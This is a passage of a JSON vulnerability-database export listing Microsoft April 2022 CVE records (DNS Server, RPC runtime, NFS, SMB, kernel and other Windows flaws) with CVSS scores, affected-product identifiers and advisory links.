CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26811", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T20:33:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2022-26811", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26811", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:08", "description": "Windows DNS Server Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26813", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T20:22:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", 
"cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-26813", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26813", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:28:00", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24536", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-19T16:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-24536", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24536", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}], "akamaiblog": [{"lastseen": "2023-05-27T14:43:59", "description": "Microsoft's April 2022 Patch Tuesday introduced patches to more than a hundred new vulnerabilities in various components. 
Three critical vulnerabilities were found and patched in Windows RPC (Remote Procedure Call) runtime: CVE-2022-24492 and CVE-2022-24528 (discovered by Yuki Chen with Cyber KunLun) CVE-2022-26809 (discovered by BugHunter010 with Kunlun)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T09:15:00", "type": "akamaiblog", "title": "Critical Remote Code Execution Vulnerabilities in Windows RPC Runtime", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809"], "modified": "2022-04-13T09:15:00", "id": "AKAMAIBLOG:A37E08A92B8D58375143A320413C6011", "href": "https://www.akamai.com/blog/security/critical-remote-code-execution-vulnerabilities-windows-rpc-runtime", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-05-27T14:45:29", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24492, CVE-2022-26809.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-12T07:00:00", "type": "mscve", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809"], "modified": "2022-04-12T07:00:00", "id": "MS:CVE-2022-24528", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24528", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:18", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24492, CVE-2022-24528.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809"], "modified": "2022-04-19T07:00:00", "id": "MS:CVE-2022-26809", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26809", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:19", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24528, CVE-2022-26809.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Remote Procedure Call Runtime Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-24492", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24492", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:19", "description": "Windows Network File System Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24497.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows Network File System Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491", "CVE-2022-24497"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-24491", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24491", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:31", "description": "Windows Network File System Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24491.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T07:00:00", "type": "mscve", "title": "Windows Network File System Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491", "CVE-2022-24497"], "modified": "2022-04-05T07:00:00", "id": "MS:CVE-2022-24497", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24497", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:19", "description": "Windows Server Service Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows 
Server Service Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24541"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-24541", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24541", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:29", "description": "Windows Kernel Information Disclosure Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-12T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2022-24483"], "modified": "2022-04-12T07:00:00", "id": "MS:CVE-2022-24483", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24483", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-05-27T14:45:22", "description": "Windows User Profile Service Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26904"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26904", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26904", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:30", "description": "Windows SMB Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 
"HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-12T07:00:00", "type": "mscve", "title": "Windows SMB Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24500"], "modified": "2022-04-12T07:00:00", "id": "MS:CVE-2022-24500", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24500", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T16:35:53", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-10T07:00:00", "id": "MS:CVE-2021-34484", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:32", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2022>) for more information.\n\nGoogle is aware that an exploit for CVE-2022-1096 exists in the wild.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-26T07:00:00", "type": "mscve", "title": "Chromium: CVE-2022-1096 Type Confusion in V8", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], 
"modified": "2022-05-10T07:00:00", "id": "MS:CVE-2022-1096", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:27", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24481.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows Common Log File System Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24481", "CVE-2022-24521"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-24521", "href": 